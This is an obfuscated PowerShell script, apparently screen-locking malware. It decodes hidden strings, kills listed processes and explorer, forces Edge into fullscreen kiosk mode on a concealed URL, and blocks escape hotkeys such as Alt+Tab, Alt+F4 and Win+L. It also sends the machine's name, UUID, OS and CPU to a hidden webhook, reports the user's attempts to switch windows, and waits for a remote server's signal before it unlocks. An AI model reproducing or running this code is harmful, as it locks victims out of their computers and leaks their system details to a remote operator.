$ErrorActionPreference = "Stop"

Add-Type -AssemblyName System.Windows.Forms

function HvKUGnFaPhnK($title, $text, $duration) {
    $balloon = New-Object System.Windows.Forms.NotifyIcon
    $balloon.Icon = [System.Drawing.SystemIcons]::Warning
    $balloon.BalloonTipTitle = $title
    $balloon.BalloonTipText = $text
    $balloon.Visible = $true
    $balloon.ShowBalloonTip($duration * 1000)
    Start-Sleep -Seconds $duration
    $balloon.Dispose()
}

function aLHanjHMqKQk($link, $title, $color, $fields) {
    $embedBody = @{
        embeds = @(
            @{
                title = $title
                color = $color
                fields = $fields
            }
        )
    } | ConvertTo-Json -Depth 10

    try {
        Invoke-RestMethod -Uri $link -Method Post -ContentType "application/json" -Body $embedBody -ErrorAction Stop | Out-Null
    } catch {}
}

function uDluPayfpcbz($reversed, $key) {
    $unreversed = -join ($reversed.ToCharArray() | Sort-Object { [array]::IndexOf($reversed.ToCharArray(), $_) } -Descending)
    $charArr = $reversed.ToCharArray()
    [array]::Reverse($charArr)
    $unreversed = -join $charArr
    $decoded = [System.Convert]::FromBase64String($unreversed)
    $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($key)
    $result = New-Object byte[] $decoded.Length
    for ($i = 0; $i -lt $decoded.Length; $i++) {
        $result[$i] = $decoded[$i] -bxor $keyBytes[$i % $keyBytes.Length]
    }
    return [System.Text.Encoding]::UTF8.GetString($result)
}

$XxmWIASGJShM = @("74a2a9dd", "2a540373", "8421cacb", "ac242781", "23de74d8", "7503588e", "28b47cd0", "3d538010", "91560ab7", "8f7b7952", "cfbd6448", "6357c4a0", "29b84081", "4a63dbe6", "10c8d1b1", "fd0ffef4", "d21ca6c3", "36931b66", "a1eb3110", "5bf363a7", "7742c186", "cd2e1cc5", "5738dcbc", "695a3296", "fdea57f7", "8e1dc07d", "134311d5", "ed6d9fdf", "0796f9f4", "a412e19f", "0e0ebb59", "d3969aa5", "8bb4b9a4", "86108c86", "d89cad72", "8d0fe514", "bffc086c", "13469312", "b752c244", "a92f68f4", "ad1d1124", "feef7390", "47b5c73c", "c9860fee", "6761b795", "0422f4cb", "3b0e3d85", "9b104735", "b32bbc16", "c7bf05cc", "648ef8a8", "24d686cf", "2f3c46a7", "f3a44d17", "140901b9", "ca133209", "8b848cbf", "10bb496f", "93af304f", "9df4834b", "b90a2b24", "fc690041", "632ffa3b", "da9913f8", "cf597b1b", "8222d71d", "13b4ccac", "775625c7", "aa850860", "2daf725c", "bd50ba48", "1865cc29", "bcb07438", "13f27b87", "1b237fd4", "7b84a514", "adbd04d6", "99cd9629", "520a9a26", "e048c8b8", "b4b0e061", "646615f5", "4927ed15", "09669406", "37cf5908", "116ee9e0", "e581f37c", "0bc869bc", "e6e90e65", "1ed10cf0", "99317767", "69eb73a0", "43c79da6", "0de9f87f", "7fcd7297", "eddf8c46", "2712d038", "1eb58897", "ff2652cd", "729ea1f5", "7a87e40b", "cd963bf6", "707c696c", "42774657")
    $IwaJOBbvoBCV = -join @($XxmWIASGJShM[64], $XxmWIASGJShM[44], $XxmWIASGJShM[61], $XxmWIASGJShM[23])
    $guGTdfxbGqIi = -join @($XxmWIASGJShM[0], $XxmWIASGJShM[86], $XxmWIASGJShM[33], $XxmWIASGJShM[58])
    $FWhZrdPiStvn = -join @($XxmWIASGJShM[83], $XxmWIASGJShM[37], $XxmWIASGJShM[101], $XxmWIASGJShM[10])
    $XGfRFFFrsECE = -join @($XxmWIASGJShM[42], $XxmWIASGJShM[43], $XxmWIASGJShM[93], $XxmWIASGJShM[40])
    $gqxbvjQYRZVt = -join @($XxmWIASGJShM[3], $XxmWIASGJShM[26], $XxmWIASGJShM[65], $XxmWIASGJShM[71])
    $jxwrwjaGLoTR = -join @($XxmWIASGJShM[51], $XxmWIASGJShM[54], $XxmWIASGJShM[103], $XxmWIASGJShM[11])
    $JfRygCnfAeHp = -join @($XxmWIASGJShM[55], $XxmWIASGJShM[21], $XxmWIASGJShM[28], $XxmWIASGJShM[92])
    $VTplXVaVtrZw = -join @($XxmWIASGJShM[17], $XxmWIASGJShM[4], $XxmWIASGJShM[78], $XxmWIASGJShM[87])
    $cHpcAGBbetnI = -join @($XxmWIASGJShM[95], $XxmWIASGJShM[63], $XxmWIASGJShM[12], $XxmWIASGJShM[53])
    $FKcoiQtaIVNB = -join @($XxmWIASGJShM[32], $XxmWIASGJShM[102], $XxmWIASGJShM[77], $XxmWIASGJShM[35])
    $aXRGWUCNEVnt = -join @($XxmWIASGJShM[98], $XxmWIASGJShM[39], $XxmWIASGJShM[16], $XxmWIASGJShM[34])
    $CZkDPzeOWRGe = -join @($XxmWIASGJShM[88], $XxmWIASGJShM[75], $XxmWIASGJShM[79], $XxmWIASGJShM[30])
    $cYwWxwlWCWmR = -join @($XxmWIASGJShM[99], $XxmWIASGJShM[2], $XxmWIASGJShM[49], $XxmWIASGJShM[56])
    $cBfSfNJbmnwU = -join @($XxmWIASGJShM[96], $XxmWIASGJShM[29], $XxmWIASGJShM[7], $XxmWIASGJShM[84])
    $isXDJUPBEekp = -join @($XxmWIASGJShM[1], $XxmWIASGJShM[94], $XxmWIASGJShM[76], $XxmWIASGJShM[89])
    $PRqGosbsqKIk = -join @($XxmWIASGJShM[72], $XxmWIASGJShM[100], $XxmWIASGJShM[38], $XxmWIASGJShM[70])
    $ZlHRYTOzdKlx = -join @($XxmWIASGJShM[62], $XxmWIASGJShM[68], $XxmWIASGJShM[41], $XxmWIASGJShM[82])
    $ylwgusmPsEdb = -join @($XxmWIASGJShM[52], $XxmWIASGJShM[50], $XxmWIASGJShM[31], $XxmWIASGJShM[6])
    $rDTLhTzJoezl = -join @($XxmWIASGJShM[27], $XxmWIASGJShM[48], $XxmWIASGJShM[46], $XxmWIASGJShM[57])
    $xUxkMUUoZoDz = -join @($XxmWIASGJShM[9], $XxmWIASGJShM[14], $XxmWIASGJShM[60], $XxmWIASGJShM[20])
    $YQtSkoeWXIDu = -join @($XxmWIASGJShM[74], $XxmWIASGJShM[8], $XxmWIASGJShM[15], $XxmWIASGJShM[45])
    $srDJAIqYmthC = -join @($XxmWIASGJShM[24], $XxmWIASGJShM[19], $XxmWIASGJShM[36], $XxmWIASGJShM[90])
    $rxpUPMtYfjHs = -join @($XxmWIASGJShM[25], $XxmWIASGJShM[69], $XxmWIASGJShM[80], $XxmWIASGJShM[81])
    $cMjdGEvIredN = -join @($XxmWIASGJShM[73], $XxmWIASGJShM[59], $XxmWIASGJShM[91], $XxmWIASGJShM[22])
    $eRpHFZEAJvQG = -join @($XxmWIASGJShM[67], $XxmWIASGJShM[5], $XxmWIASGJShM[66], $XxmWIASGJShM[13])
    $ebDFHmGXNjfc = -join @($XxmWIASGJShM[85], $XxmWIASGJShM[18], $XxmWIASGJShM[47], $XxmWIASGJShM[97])

$KdQDnBUYacdg = "IEgXX5gCPAlBKc1Xe51HdZVVNJwWMhFEW9kVB1kHYRUSBJxC"
$YsAGnsQkIrEs = "==QbyJ3WqZUdP1EVYtXNCxGGPUVCaBQd7wnBXsGCVVlVxR1XyBQX7Z0cbJ1RCUhWvRUN+w1COI0NlJlKBInZfYBWTtVVHchBFQQDRVgBSJgCEUFXXtwVFUVBYUxXfxlDDYlTZE1EZ9BXZtVTTFUCStEXBs0SDIhQVA0X"
$IOhyBFQSOYWA = "==gQXsgCIU1BOEXGX1gAf5hUWQUUDx1Vk1VTYdnFdd1VaIkCHIRDZVAEWVETGYhWFplXYMkUDlxHOokRC1EW"
$RsUchTLegKMG = "==wFUIhVMVjFL0QUIo0BfQUXJ5gAn51FbNCGZtVUfUkCUBxDJQlSDoEEGUUDR8wVY8EWRwEHNARRWMEX"
$lFGyOFTwGkZf = "=4TQNllXUZBWRZkEeAhSQZhXdNETWNREUUxVCNVEDshEPFUUEdlUXg1cGJhHQ0FWLMUWQZxEdMRWFdFRdFkO"
$eDAczlyOfFIw = "==AQaxgXGB0UEVBTO5lQDRRXHUkQYR0RRUhAehBRBc0Z"
$UsYLZfxWJREL = "CMVTWVVXAMESJAVDQo0XCNRQUJhN"
$wYlbEAFMNzCc = "AkgU8ZhRNUEWKN1d"
$wPcfWRAcAMGB = "==gItMTL"
$CGwfOuyRppfz = "YZ1XQUUVhRhEO1AUMswb"
$YxjKSegigWEc = "nZTJ"
$etThDESFRjgz = "ad1CEd0UzABXCIFI"
$LuMkWdeTxBnx = "==wFDNFQrVBCehgFKdFZ"
$CwCNXFJbIKFA = "=EUFzFBUP0EXCNwVDhFd"
$RqckNcfNyeEX = "==QUYhgZ"
$kFFLzsQGBmzp = "==wVRx1UN8AI"
$TeGhmCJBJxNZ = "==gEMxFRVUkUa1EFdZVQRZUAAIxQfR1WWlVDDIkVTcgRHx1b"
$sIRxHtBpJyWT = "XFATAY1DIoUUidxDZ1FEANQY"
$NWmVvSZZJBfO = "==ASKkAUXUUAWY0WYx0BCd1XcxlC2VkHGYlQSZgFHY1EMkQDSgFCZ1wM"
$EguEmUdyFcMm = "=whBXVRVVJBXNIFRBdQUUBUWYdxDW5Rf"
$kjynxiORDkRo = "DA1VXFBX"
$PycSISMHdSud = "==wBNJFSSJVBAcxC"
$oJeVeHsJcegD = "DkRAcYhUCxACB1RX"
$xtnRVkrgABoB = "YI1BGZFTaNxCalVXCVUXUEEd"
$ehuJfeTvbcHf = "ZhlCBJ0UW9kc"
$xqkDLEkSDzPz = "==AVCE1Ft5gBXVkY"

try {
    $bRdNlQlvNWXj = uDluPayfpcbz $KdQDnBUYacdg $IwaJOBbvoBCV
    $UQWMgXxemlyG = uDluPayfpcbz $YsAGnsQkIrEs $guGTdfxbGqIi
    $kIjamoOtShZF = uDluPayfpcbz $IOhyBFQSOYWA $FWhZrdPiStvn
    $GWURVXPVrRQV = uDluPayfpcbz $RsUchTLegKMG $XGfRFFFrsECE
    $cfJzaoshAVrJ = uDluPayfpcbz $lFGyOFTwGkZf $gqxbvjQYRZVt
    $BziKbicDvsWb = uDluPayfpcbz $eDAczlyOfFIw $jxwrwjaGLoTR
    $TnaYxRcrTKTT = uDluPayfpcbz $UsYLZfxWJREL $JfRygCnfAeHp
    $bSRJrHFSUQnG = uDluPayfpcbz $wYlbEAFMNzCc $VTplXVaVtrZw
    $oanqaErbDQlA = uDluPayfpcbz $wPcfWRAcAMGB $cHpcAGBbetnI
    $ygZlsxwbvOSh = uDluPayfpcbz $CGwfOuyRppfz $FKcoiQtaIVNB
    $FHqYKiIElutq = uDluPayfpcbz $YxjKSegigWEc $aXRGWUCNEVnt
    $VeZGgnkDGmXn = uDluPayfpcbz $etThDESFRjgz $CZkDPzeOWRGe
    $VwbPRbtUxCPd = uDluPayfpcbz $LuMkWdeTxBnx $cYwWxwlWCWmR
    $HuQjNVGmyprL = uDluPayfpcbz $CwCNXFJbIKFA $cBfSfNJbmnwU
    $EinvamEiLouP = uDluPayfpcbz $RqckNcfNyeEX $isXDJUPBEekp
    $vTnQUMbIfztB = uDluPayfpcbz $kFFLzsQGBmzp $PRqGosbsqKIk
    $BRQySSMdxDUo = uDluPayfpcbz $TeGhmCJBJxNZ $ZlHRYTOzdKlx
    $FFQddZmoISHI = uDluPayfpcbz $sIRxHtBpJyWT $ylwgusmPsEdb
    $UrWVwlSYDYEY = uDluPayfpcbz $NWmVvSZZJBfO $rDTLhTzJoezl
    $zqrdhOLFWRkh = uDluPayfpcbz $EguEmUdyFcMm $xUxkMUUoZoDz
    $UviZWCQvDaRe = uDluPayfpcbz $kjynxiORDkRo $YQtSkoeWXIDu
    $RxzNGTYLErWV = uDluPayfpcbz $PycSISMHdSud $srDJAIqYmthC
    $fCXuNEzuRGPa = uDluPayfpcbz $oJeVeHsJcegD $rxpUPMtYfjHs
    $yOCgaZTHJoPB = uDluPayfpcbz $xtnRVkrgABoB $cMjdGEvIredN
    $yGlAdCMmNSCq = uDluPayfpcbz $ehuJfeTvbcHf $eRpHFZEAJvQG
    $kdMyChVFwzkz = uDluPayfpcbz $xqkDLEkSDzPz $ebDFHmGXNjfc
    $cfJzaoshAVrJ = $cfJzaoshAVrJ | ConvertFrom-Json
} catch { exit 1 }


try {
$ENdYBIkQBpqN = (Get-CimInstance -Class Win32_ComputerSystemProduct).UUID
try {
    $oyXxilFhWnOl = (Invoke-WebRequest -Uri $kIjamoOtShZF -UseBasicParsing -ErrorAction Stop).Content
} catch { exit 1 }

if ($oyXxilFhWnOl -match $ENdYBIkQBpqN) {
    HvKUGnFaPhnK $vTnQUMbIfztB $BRQySSMdxDUo 10
    exit 0
}

try {
    $DHvffUvZaNnU = (Invoke-WebRequest -Uri $GWURVXPVrRQV -UseBasicParsing -ErrorAction Stop).Content.Trim().ToLower()
} catch { exit 1 }

if ($DHvffUvZaNnU -eq "true") {
    Write-Host $zqrdhOLFWRkh
    exit 0
}

foreach ($NswoJuTwszHt in $cfJzaoshAVrJ) {
    $yrOOsmNWoetf = $NswoJuTwszHt -replace "\.exe`$",""
    if (Get-Process -Name $yrOOsmNWoetf -ErrorAction SilentlyContinue) {
        if ($NswoJuTwszHt -notmatch "\.exe`$") {
            $NswoJuTwszHt = "$NswoJuTwszHt.exe"
        }
        try {
            taskkill /F /IM $NswoJuTwszHt /T 2>&1 | Out-Null
        } catch {}
    }
}

Start-Process $RxzNGTYLErWV "--kiosk `"$bRdNlQlvNWXj`" --edge-kiosk-type=fullscreen --no-first-run"

Start-Sleep -Seconds 3

$iavNshronSTp = @"
using System;
using System.Runtime.InteropServices;
public class KeyBlock {
    [DllImport("user32.dll")]
    public static extern bool RegisterHotKey(IntPtr hWnd, int id, uint fsModifiers, uint vk);
    [DllImport("user32.dll")]
    public static extern bool UnregisterHotKey(IntPtr hWnd, int id);
    [DllImport("user32.dll")]
    public static extern IntPtr GetForegroundWindow();
    [DllImport("user32.dll", SetLastError=true)]
    public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint processId);
    [DllImport("user32.dll")]
    public static extern bool SetForegroundWindow(IntPtr hWnd);

    private const uint MOD_ALT = 0x0001;
    private const uint MOD_CONTROL = 0x0002;
    private const uint MOD_WIN = 0x0008;

    public static void BlockKeys() {
        RegisterHotKey(IntPtr.Zero, 1, MOD_ALT, 0x09);
        RegisterHotKey(IntPtr.Zero, 2, MOD_ALT | MOD_CONTROL, 0x09);
        RegisterHotKey(IntPtr.Zero, 3, MOD_WIN, 0x44);
        RegisterHotKey(IntPtr.Zero, 4, MOD_WIN, 0x09);
        RegisterHotKey(IntPtr.Zero, 5, MOD_ALT, 0x73);
        RegisterHotKey(IntPtr.Zero, 6, MOD_CONTROL, 0x1B);
        RegisterHotKey(IntPtr.Zero, 7, MOD_WIN, 0x45);
        RegisterHotKey(IntPtr.Zero, 8, MOD_WIN, 0x52);
        RegisterHotKey(IntPtr.Zero, 9, MOD_ALT, 0x1B);
        RegisterHotKey(IntPtr.Zero, 10, MOD_WIN, 0x4C);
        RegisterHotKey(IntPtr.Zero, 11, 0, 0x2C);
        RegisterHotKey(IntPtr.Zero, 12, MOD_WIN, 0x2C);
        RegisterHotKey(IntPtr.Zero, 13, MOD_ALT, 0x2C);
    }

    public static void UnblockKeys() {
        for (int i = 1; i <= 13; i++) {
            UnregisterHotKey(IntPtr.Zero, i);
        }
    }
}
"@

try {
    Add-Type -TypeDefinition $iavNshronSTp -ErrorAction Stop
} catch { }

[KeyBlock]::BlockKeys()

$HznaGyHawCLN = $env:COMPUTERNAME
$wPySQlNVIWRH = (Get-CimInstance -Class Win32_OperatingSystem).Caption
$PobpbouLkUBB = (Get-CimInstance -Class Win32_Processor).Name
$uQeInEtKwNEt = (Get-Item "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
if (-not $uQeInEtKwNEt) {
    $uQeInEtKwNEt = (Get-Item "C:\Program Files\Microsoft\Edge\Application\msedge.exe" -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
}
if (-not $uQeInEtKwNEt) { $uQeInEtKwNEt = "Unknown" }
$PEsqjNfDQXHE = Get-Date -Format "HH:mm:ss | dd/MM/yyyy"

$HmHvlXdJmBqR = @(
    @{ name = $bSRJrHFSUQnG; value = $HznaGyHawCLN; inline = $true }
    @{ name = $oanqaErbDQlA; value = $ENdYBIkQBpqN; inline = $true }
    @{ name = $ygZlsxwbvOSh; value = $wPySQlNVIWRH; inline = $false }
    @{ name = $FHqYKiIElutq; value = $PobpbouLkUBB; inline = $false }
    @{ name = $VeZGgnkDGmXn; value = $uQeInEtKwNEt; inline = $true }
    @{ name = $VwbPRbtUxCPd; value = $PEsqjNfDQXHE; inline = $true }
)
aLHanjHMqKQk $UQWMgXxemlyG $BziKbicDvsWb 3066993 $HmHvlXdJmBqR

$global:RuazsEAOTKIR = $true

$NfSmBUdjkjQS = Start-Job -ScriptBlock {
    param($url)
    while ($true) {
        try {
            $ddhqXkVJlyFn = (Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction Stop).Content.Trim().ToLower()
            if ($ddhqXkVJlyFn -eq "true") {
                return "completed"
            }
        } catch {}
        Start-Sleep -Seconds 20
    }
} -ArgumentList $GWURVXPVrRQV

while ($global:RuazsEAOTKIR) {
    for ($i = 0; $i -lt 50; $i++) {
        [System.Windows.Forms.Application]::DoEvents()
        Start-Sleep -Milliseconds 10
    }

    if (Get-Process -Name "explorer" -ErrorAction SilentlyContinue) {
        try {
            taskkill /F /IM $fCXuNEzuRGPa /T 2>&1 | Out-Null
        } catch {}
    }

    if ($NfSmBUdjkjQS.State -eq "Completed") {
        $condition = Receive-Job -Job $NfSmBUdjkjQS
        if ($condition -eq "completed") {
            [KeyBlock]::UnblockKeys()
            taskkill /F /IM $RxzNGTYLErWV /T 2>&1 | Out-Null
            Start-Process $fCXuNEzuRGPa
            $global:RuazsEAOTKIR = $false
            break
        }
    }

    $yPVaImcQkhRU = [KeyBlock]::GetForegroundWindow()
    $jUjXuELJujZj = 0
    [KeyBlock]::GetWindowThreadProcessId($yPVaImcQkhRU, [ref]$jUjXuELJujZj) | Out-Null
    $xkXZDWgyFttU = $null
    try { $xkXZDWgyFttU = Get-Process -Id $jUjXuELJujZj -ErrorAction Stop } catch {}

    if ($xkXZDWgyFttU -and $xkXZDWgyFttU.ProcessName -ne $UviZWCQvDaRe) {
        $sejugvftFbFa = @(
            @{ name = $bSRJrHFSUQnG; value = $HznaGyHawCLN; inline = $true }
            @{ name = $oanqaErbDQlA; value = $ENdYBIkQBpqN; inline = $true }
            @{ name = $HuQjNVGmyprL; value = $xkXZDWgyFttU.ProcessName; inline = $false }
            @{ name = $EinvamEiLouP; value = (Get-Date -Format "HH:mm:ss | dd/MM/yyyy"); inline = $false }
        )
        aLHanjHMqKQk $UQWMgXxemlyG $TnaYxRcrTKTT 15158332 $sejugvftFbFa

        HvKUGnFaPhnK $FFQddZmoISHI $UrWVwlSYDYEY 5

        [KeyBlock]::UnblockKeys()
        taskkill /F /IM $RxzNGTYLErWV /T 2>&1 | Out-Null
        Start-Process $fCXuNEzuRGPa
        
        $global:RuazsEAOTKIR = $false
        break
    }

}

[KeyBlock]::UnblockKeys()
Stop-Job -Job $NfSmBUdjkjQS -ErrorAction SilentlyContinue
Remove-Job -Job $NfSmBUdjkjQS -Force -ErrorAction SilentlyContinue
Get-Job | Where-Object { $_.State -ne "Running" } | Remove-Job -Force -ErrorAction SilentlyContinue

} catch {
    $IlVImYiXVzXa = @(
        @{ name = $bSRJrHFSUQnG; value = $env:COMPUTERNAME; inline = $true }
        @{ name = $yGlAdCMmNSCq; value = $_.Exception.Message; inline = $false }
        @{ name = $kdMyChVFwzkz; value = $_.ScriptStackTrace; inline = $false }
    )
    aLHanjHMqKQk $UQWMgXxemlyG $yOCgaZTHJoPB 16711680 $IlVImYiXVzXa
    exit 1
}
